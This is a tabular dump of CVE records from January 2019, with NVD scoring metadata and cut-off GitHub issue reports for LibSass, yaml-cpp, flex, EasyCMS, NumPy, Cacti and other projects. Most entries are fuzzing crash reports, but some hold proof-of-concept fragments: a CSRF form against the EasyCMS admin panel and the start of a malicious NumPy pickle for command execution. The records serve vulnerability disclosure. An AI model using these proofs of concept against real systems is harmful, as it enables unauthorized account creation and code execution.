CVE-2019-6283 | 2019-01-14T22:29:00.280 | In LibSass 3.5.5, a heap-based buffer over-read exists in Sass::Prelexer::parenthese_scope in prelexer.hpp. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00047.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sass-lang:libsass:3.5.5:*:*:*:*:*:*:*",
"matchCriteriaId": "33F93E15-A191-40F7-BADA-F4EE73DA6F7B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcl... | [
"125"
] | 125 | https://github.com/sass/libsass/issues/2814 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"sass",
"libsass"
] | A heap-buffer-overflow in prelexer.hpp:70:14 in Sass::Prelexer::parenthese_scope(char const*)
Compile and reproduce:
`CC=afl-clang-fast CXX=afl-clang-fast++ AFL_USE_ASAN=1 make -C sassc -j4`
ldd:
$ ldd sassc
linux-vdso.so.1 => (0x00007fffc6365000)
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.s... | AddressSanitizer: heap-buffer-overflow /home/eack/libsass/src/prelexer.hpp:69:14 in Sass::Prelexer::parenthese_scope(char const*) | https://api.github.com/repos/sass/libsass/issues/2814/comments | 2 | 2019-01-14T05:26:25Z | 2020-06-20T23:21:34Z | https://github.com/sass/libsass/issues/2814 | 398,753,003 | 2,814 | 39 |
CVE-2019-6284 | 2019-01-14T22:29:00.343 | In LibSass 3.5.5, a heap-based buffer over-read exists in Sass::Prelexer::alternatives in prelexer.hpp. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00047.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sass-lang:libsass:3.5.5:*:*:*:*:*:*:*",
"matchCriteriaId": "33F93E15-A191-40F7-BADA-F4EE73DA6F7B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcl... | [
"125"
] | 125 | https://github.com/sass/libsass/issues/2816 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"sass",
"libsass"
] | A heap-buffer-overflow in prelexer.hpp:69:14 in char const* Sass::Prelexer::alternatives<&Sass::Prelexer::hexa, &(char const* Sass::Prelexer::sequence<&(char const* Sass::Prelexer::exactly<(char)40>(char const*)), &(char const* Sass::Prelexer::skip_over_scopes<&(char const* Sass::Prelexer::exactly<(char)40>(char const*... | AddressSanitizer: heap-buffer-overflow | https://api.github.com/repos/sass/libsass/issues/2816/comments | 1 | 2019-01-14T06:46:57Z | 2019-04-15T06:43:12Z | https://github.com/sass/libsass/issues/2816 | 398,765,964 | 2,816 | 40 |
CVE-2019-6285 | 2019-01-14T22:29:00.390 | The SingleDocParser::HandleFlowSequence function in yaml-cpp (aka LibYaml-C++) 0.6.2 allows remote attackers to cause a denial of service (stack consumption and application crash) via a crafted YAML file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/jbeder/yaml-cpp/issues/660"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yaml-cpp_project:yaml-cpp:0.6.2:*:*:*:*:*:*:*",
"matchCriteriaId": "E8693389-E1C8-4A1F-B142-E1CA51BE82D2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionS... | [
"674"
] | 674 | https://github.com/jbeder/yaml-cpp/issues/660 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"jbeder",
"yaml-cpp"
] | Stack Overflow in SingleDocParser::HandleFlowSequence(YAML::EventHandler&) ()
position:[code](https://github.com/jbeder/yaml-cpp/blob/b87c76a2ef4f974e2739a2d410ee5e36122cfc00/src/singledocparser.cpp#L183)
[poc](https://github.com/jbeder/yaml-cpp/files/2754280/crash0.zip)
To reproduce: `./parse < crash0`
gdb... | Stack Overflow in SingleDocParser::HandleFlowSequence(YAML::EventHandler&) () | https://api.github.com/repos/jbeder/yaml-cpp/issues/660/comments | 8 | 2019-01-14T07:58:28Z | 2020-04-09T18:02:11Z | https://github.com/jbeder/yaml-cpp/issues/660 | 398,780,528 | 660 | 41 |
CVE-2019-6286 | 2019-01-14T22:29:00.437 | In LibSass 3.5.5, a heap-based buffer over-read exists in Sass::Prelexer::skip_over_scopes in prelexer.hpp when called from Sass::Parser::parse_import(), a similar issue to CVE-2018-11693. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00047.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00051.html"
},
{
"source": "cve@mit... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sass-lang:libsass:3.5.5:*:*:*:*:*:*:*",
"matchCriteriaId": "33F93E15-A191-40F7-BADA-F4EE73DA6F7B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcl... | [
"125"
] | 125 | https://github.com/sass/libsass/issues/2815 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"sass",
"libsass"
] | A heap-buffer-overflow in prelexer.hpp:69:14 in char const* Sass::Prelexer::skip_over_scopes<&(char const* Sass::Prelexer::exactly<(char)40>(char const*)), &(char const* Sass::Prelexer::exactly<(char)41>(char const*))>(char const*, char const*)
Compile and reproduce:
`CC=afl-clang-fast CXX=afl-clang-fast++ AFL_USE_... | AddressSanitizer: heap-buffer-overflow | https://api.github.com/repos/sass/libsass/issues/2815/comments | 1 | 2019-01-14T06:39:46Z | 2019-04-15T06:43:12Z | https://github.com/sass/libsass/issues/2815 | 398,764,663 | 2,815 | 42 |
CVE-2019-6292 | 2019-01-15T00:29:00.477 | An issue was discovered in singledocparser.cpp in yaml-cpp (aka LibYaml-C++) 0.6.2. Stack Exhaustion occurs in YAML::SingleDocParser, and there is a stack consumption problem caused by recursive stack frames: HandleCompactMap, HandleMap, HandleFlowSequence, HandleSequence, HandleNode. Remote attackers could leverage th... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/jbeder/yaml-cpp/issues/657"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yaml-cpp_project:yaml-cpp:0.6.2:*:*:*:*:*:*:*",
"matchCriteriaId": "E8693389-E1C8-4A1F-B142-E1CA51BE82D2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionS... | [
"674"
] | 674 | https://github.com/jbeder/yaml-cpp/issues/657 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"jbeder",
"yaml-cpp"
] | Hi there,
An issue was discovered in singledocparser.cpp, as distributed in yaml-cpp v0.6.2. Stack Exhaustion occurs in the YAML::SingleDocParser, and there is a stack consumption problem caused by recursive stack frames: HandleCompactMap, HandleMap, HandleFlowSequence, HandleSequence, HandleNode.
Here is the POC... | Recursive Stack Frames: HandleCompactMap, HandleMap, HandleFlowSequence, HandleSequence, HandleNode | https://api.github.com/repos/jbeder/yaml-cpp/issues/657/comments | 4 | 2019-01-02T14:29:02Z | 2024-03-04T15:57:49Z | https://github.com/jbeder/yaml-cpp/issues/657 | 395,264,845 | 657 | 43 |
CVE-2019-6293 | 2019-01-15T00:29:00.523 | An issue was discovered in the function mark_beginning_as_normal in nfa.c in flex 2.6.4. There is a stack exhaustion problem caused by the mark_beginning_as_normal function making recursive calls to itself in certain scenarios involving lots of '*' characters. Remote attackers could leverage this vulnerability to cause... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/westes/flex/issues/414"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:westes:flex:2.6.4:*:*:*:*:*:*:*",
"matchCriteriaId": "102A6858-CA8E-4679-9806-0851B19327EC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding"... | [
"674"
] | 674 | https://github.com/westes/flex/issues/414 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"westes",
"flex"
] | Hi there,
An issue was discovered in function mark_beginning_as_normal in nfa.c, as distributed in flex 2.6.4. There is a stack exhaustion problem caused by the in mark_beginning_as_normal function making recursive calls to itself in certain scenarios involving lots of '*' characters.
Here is the POC file. Please... | Stack Comsumption Problem Caused By the mark_beginning_as_normal Function Making Recursive Calls to Itself | https://api.github.com/repos/westes/flex/issues/414/comments | 3 | 2019-01-09T07:06:10Z | 2023-06-13T12:48:27Z | https://github.com/westes/flex/issues/414 | 397,238,545 | 414 | 44 |
CVE-2019-6294 | 2019-01-15T14:29:00.220 | An issue was discovered in EasyCMS 1.5. There is CSRF via the index.php?s=/admin/articlem/insert/navTabId/listarticle/callbackType/closeCurrent URI. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/TeamEasy/EasyCMS/issues/8"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.c... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:easycms:easycms:1.5:*:*:*:*:*:*:*",
"matchCriteriaId": "FF2DE269-B0B1-41F7-80C6-AC84FDB55764",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | [
"352"
] | 352 | https://github.com/TeamEasy/EasyCMS/issues/8 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"TeamEasy",
"EasyCMS"
] | After the administrator logged in, open the following page
poc:
one.html---add a user
```<html>
<!-- CSRF PoC -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/EasyCMS-master/index.php?s=/admin/articlem/insert/navTabId/listarticle/callbackType/closeCurrent" ... | There is one CSRF vulnerability that can add the user account | https://api.github.com/repos/TeamEasy/EasyCMS/issues/8/comments | 0 | 2019-01-15T09:48:11Z | 2019-01-15T13:37:44Z | https://github.com/TeamEasy/EasyCMS/issues/8 | 399,263,747 | 8 | 45 |
CVE-2019-6439 | 2019-01-16T03:29:00.283 | examples/benchmark/tls_bench.c in a benchmark tool in wolfSSL through 3.15.7 has a heap-based buffer overflow. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/106640"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/wolfSSL/wolfssl/issues/20... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:wolfssl:wolfssl:*:*:*:*:*:*:*:*",
"matchCriteriaId": "254F6CA5-6C83-4B6D-BB7D-BBD05A0A6620",
"versionEndExcluding": null,
"versionEndIncluding": "3.15.7",
"versionStartExclud... | [
"787"
] | 787 | https://github.com/wolfSSL/wolfssl/issues/2032 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"wolfSSL",
"wolfssl"
] | Hi Team,
## Summary
I have compiled wolfSSL using clang and a heap based buffer overflow is observed in `tls_bench.c`
## System info:
`Linux zero 4.15.0-43-generic #46-Ubuntu SMP Thu Dec 6 14:45:28 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux`
## ASAN
```
==4088==ERROR: AddressSanitizer: heap-buffer-overflow on... | heap-buffer-overflow [tls_bench+0x50ff15] | https://api.github.com/repos/wolfSSL/wolfssl/issues/2032/comments | 4 | 2019-01-15T20:11:17Z | 2019-03-14T21:55:01Z | https://github.com/wolfSSL/wolfssl/issues/2032 | 399,515,922 | 2,032 | 46 |
CVE-2019-6446 | 2019-01-16T05:29:01.370 | An issue was discovered in NumPy 1.16.0 and earlier. It uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object, as demonstrated by a numpy.load call. NOTE: third parties dispute this issue because it is a behavior that might have legitimate appli... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00091.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00092.html"
},
{
"source": "cve@mit... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:numpy:numpy:*:*:*:*:*:*:*:*",
"matchCriteriaId": "80912416-97D8-4FF8-B2DB-D587EFC9D4BE",
"versionEndExcluding": null,
"versionEndIncluding": "1.16.0",
"versionStartExcluding"... | [
"502"
] | 502 | https://github.com/numpy/numpy/issues/12759 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"numpy",
"numpy"
] | numpy load function with evil data will cause command execution,if attack share evil data on internet,
when user load it , it will cause command execution.
### Reproducing code example:
```python
import numpy
from numpy import __version__
print __version__
import os
import pickle
class Test(object):
... | numpy load function with evil data will cause command execution | https://api.github.com/repos/numpy/numpy/issues/12759/comments | 32 | 2019-01-16T02:36:51Z | 2021-11-30T14:38:45Z | https://github.com/numpy/numpy/issues/12759 | 399,622,174 | 12,759 | 47 |
CVE-2018-20723 | 2019-01-16T16:29:00.510 | A cross-site scripting (XSS) vulnerability exists in color_templates.php in Cacti before 1.2.0 due to lack of escaping of unintended characters in the Name field for a Color. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00001.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00005.html"
},
{
"source": "cve@mit... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1C7FEEA7-B141-4E6E-8B73-4DFF4844A341",
"versionEndExcluding": "1.2.0",
"versionEndIncluding": null,
"versionStartExcluding":... | [
"79"
] | 79 | https://github.com/Cacti/cacti/issues/2215 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Cacti",
"cacti"
] | **Description** -
There's no escape being done before printing out the value of `Name` in the Color Template page.
<br>
**Cacti version** - v1.1.38
<br>
**Steps to reproduce** -
- Navigate to http://localhost:4040/cacti/color_templates.php?action=template_edit & add the below shared payload as the `Name`... | Stored XSS in "Name" field - Color | https://api.github.com/repos/Cacti/cacti/issues/2215/comments | 1 | 2018-12-16T05:07:28Z | 2020-06-30T05:31:09Z | https://github.com/Cacti/cacti/issues/2215 | 391,436,176 | 2,215 | 48 |
CVE-2018-20724 | 2019-01-16T16:29:00.557 | A cross-site scripting (XSS) vulnerability exists in pollers.php in Cacti before 1.2.0 due to lack of escaping of unintended characters in the Website Hostname for Data Collectors. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00001.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00005.html"
},
{
"source": "cve@mit... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1C7FEEA7-B141-4E6E-8B73-4DFF4844A341",
"versionEndExcluding": "1.2.0",
"versionEndIncluding": null,
"versionStartExcluding":... | [
"79"
] | 79 | https://github.com/Cacti/cacti/issues/2212 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Cacti",
"cacti"
] |
**Description** -
There's no escape being done before printing out the value of `Hostname` value in the Data collectors table.
<br>
**Cacti version** - v1.1.38
<br>
**Steps to reproduce** -
- Navigate to http://localhost/cacti/pollers.php?action=edit&id=1 & add the below shared payload as the `Hostn... | Stored XSS in "Website Hostname" field - Data Collectors | https://api.github.com/repos/Cacti/cacti/issues/2212/comments | 1 | 2018-12-15T11:31:18Z | 2020-06-30T05:31:10Z | https://github.com/Cacti/cacti/issues/2212 | 391,369,971 | 2,212 | 49 |
CVE-2018-20725 | 2019-01-16T16:29:00.620 | A cross-site scripting (XSS) vulnerability exists in graph_templates.php in Cacti before 1.2.0 due to lack of escaping of unintended characters in the Graph Vertical Label. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00001.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00005.html"
},
{
"source": "cve@mit... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1C7FEEA7-B141-4E6E-8B73-4DFF4844A341",
"versionEndExcluding": "1.2.0",
"versionEndIncluding": null,
"versionStartExcluding":... | [
"79"
] | 79 | https://github.com/Cacti/cacti/issues/2214 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Cacti",
"cacti"
] |
**Description** -
There's no escape being done before printing out the value of `Vertical Label` in the Graphic templates page.
<br>
**Cacti version** - v1.1.38
<br>
**Steps to reproduce** -
- Navigate to http://localhost:4040/cacti/graph_templates.php?action=template_edit&id=1 & add the below shared p... | Stored XSS in "Vertical Label" field - Graph | https://api.github.com/repos/Cacti/cacti/issues/2214/comments | 1 | 2018-12-16T05:03:25Z | 2020-06-30T05:31:09Z | https://github.com/Cacti/cacti/issues/2214 | 391,436,010 | 2,214 | 50 |
CVE-2018-20726 | 2019-01-16T16:29:00.697 | A cross-site scripting (XSS) vulnerability exists in host.php (via tree.php) in Cacti before 1.2.0 due to lack of escaping of unintended characters in the Website Hostname field for Devices. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00001.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00005.html"
},
{
"source": "cve@mit... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1C7FEEA7-B141-4E6E-8B73-4DFF4844A341",
"versionEndExcluding": "1.2.0",
"versionEndIncluding": null,
"versionStartExcluding":... | [
"79"
] | 79 | https://github.com/Cacti/cacti/issues/2213 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Cacti",
"cacti"
] |
**Description** -
There's no escape being done before printing out the value of `Hostname` value in the Tree table.
<br>
**Cacti version** - v1.1.38
<br>
**Steps to reproduce** -
- Navigate to http://localhost:4040/cacti/host.php?action=edit&id=1 & add the below shared payload as the `Hostname` field ... | Stored XSS in "Website Hostname" field - Devices | https://api.github.com/repos/Cacti/cacti/issues/2213/comments | 1 | 2018-12-16T04:56:37Z | 2020-06-30T05:31:08Z | https://github.com/Cacti/cacti/issues/2213 | 391,435,648 | 2,213 | 51 |
CVE-2019-6497 | 2019-01-20T20:29:01.180 | Hotels_Server through 2018-11-05 has SQL Injection via the controller/fetchpwd.php username parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/FantasticLBP/Hotels_Server/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:hotels_server_project:hotels_server:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D4563754-E1ED-48E7-9B35-0CF85A93BC67",
"versionEndExcluding": null,
"versionEndIncluding": "2018-11-05",
... | [
"89"
] | 89 | https://github.com/FantasticLBP/Hotels_Server/issues/1 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"FantasticLBP",
"Hotels_Server"
] | In controller/fetchpwd.php

the parameter was added with a string "username=" ,passed to function find
In the definition of function find,we can notice that though the author us... | SQL Injection Vulnerability in controller/fetchpwd.php | https://api.github.com/repos/FantasticLBP/Hotels_Server/issues/1/comments | 0 | 2019-01-19T15:20:53Z | 2019-01-19T15:20:53Z | https://github.com/FantasticLBP/Hotels_Server/issues/1 | 401,005,444 | 1 | 52 |
CVE-2019-6498 | 2019-01-21T06:29:00.407 | GattLib 0.2 has a stack-based buffer over-read in gattlib_connect in dbus/gattlib.c because strncpy is misused. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact":... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/labapart/gattlib/issues/81"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:labapart:gattlib:0.2:*:*:*:*:*:*:*",
"matchCriteriaId": "A35BB1EA-4BCF-4A08-80FB-4B8C0E8846B4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | [
"125"
] | 125 | https://github.com/labapart/gattlib/issues/81 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"labapart",
"gattlib"
] | Hi Team,
## Summary
While fuzzing **gattlib** using **clang 6.0** with ASAN a stack-based buffer-overflow was observed in [gattlib.c](https://github.com/labapart/gattlib/blob/master/dbus/gattlib.c#L222-L228) and [discover.c](https://github.com/labapart/gattlib/blob/master/examples/discover/discover.c#L38-L48)
**... | stack-based bufferoverflow | https://api.github.com/repos/labapart/gattlib/issues/81/comments | 0 | 2019-01-20T07:33:47Z | 2019-03-05T12:11:51Z | https://github.com/labapart/gattlib/issues/81 | 401,071,122 | 81 | 53 |
CVE-2019-6498 | 2019-01-21T06:29:00.407 | GattLib 0.2 has a stack-based buffer over-read in gattlib_connect in dbus/gattlib.c because strncpy is misused. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact":... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/labapart/gattlib/issues/81"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:labapart:gattlib:0.2:*:*:*:*:*:*:*",
"matchCriteriaId": "A35BB1EA-4BCF-4A08-80FB-4B8C0E8846B4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | [
"125"
] | 125 | https://github.com/labapart/gattlib/issues/82 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"labapart",
"gattlib"
] | Hi Team,
## Summary
While fuzzing **gattlib** using **clang 6.0** with ASAN a stack-based buffer-overflow was observed in [gattlib.c](https://github.com/labapart/gattlib/blob/master/dbus/gattlib.c#L222-L228) and [notification.c](https://github.com/labapart/gattlib/blob/master/examples/notification/notification.c#L5... | stack-based bufferoverflow | https://api.github.com/repos/labapart/gattlib/issues/82/comments | 0 | 2019-01-20T07:45:43Z | 2019-03-05T12:11:51Z | https://github.com/labapart/gattlib/issues/82 | 401,071,786 | 82 | 54 |
CVE-2019-6502 | 2019-01-22T08:29:00.200 | sc_context_create in ctx.c in libopensc in OpenSC 0.19.0 has a memory leak, as demonstrated by a call from eidenv. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://www.openwall.com/lists/oss-security/2019/12/29/1"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/OpenSC/OpenSC/issues/1586"
},
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:opensc_project:opensc:0.19.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A4EC94EC-2637-45D4-8F7E-857497B17B08",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStar... | [
"401"
] | 401 | https://github.com/OpenSC/OpenSC/issues/1586 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"OpenSC",
"OpenSC"
] | Hi Team,
I have build this repo using **clang** via ASAN, a **memory leak** was detected in `eidenv.c`
**ASAN**
```c
==32025==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 632 byte(s) in 1 object(s) allocated from:
#0 0x4d28d8 in calloc (/home/input0/Desktop/OpenSC/src/tools/.libs/eidenv+... | Memory leak | https://api.github.com/repos/OpenSC/OpenSC/issues/1586/comments | 11 | 2019-01-20T17:08:17Z | 2020-01-20T13:28:46Z | https://github.com/OpenSC/OpenSC/issues/1586 | 401,117,747 | 1,586 | 55 |
